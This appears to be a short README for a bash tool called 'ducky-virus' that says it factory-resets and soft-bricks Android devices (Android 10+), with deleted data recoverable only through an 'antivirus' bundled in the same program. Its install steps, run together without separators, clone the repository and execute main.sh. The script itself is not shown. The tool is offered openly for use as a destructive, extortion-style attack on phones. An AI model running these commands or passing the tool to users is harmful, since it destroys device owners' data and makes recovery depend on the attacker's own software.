Simple Bash script program to Factory reset and soft Brick an Android device (Supports Android 10+), however, the data can be recovered ONLY by the Antivirus provided in the program itself.
- Factory Reset
- Soft brick
- Software reset
- Data Deletion (recoverable)
pkg update && pkg upgrade -ypkg install git -ypkg install lolcatgit clone https://github.com/krishealty/ducky-viruscd $HOMEcd ducky-viruslsbash main.shsudo apt-get update && pkg upgrade -ysudo apt-get install git -ygit clone https://github.com/krishealty/ducky-viruscd ducky-virusbash main.sh
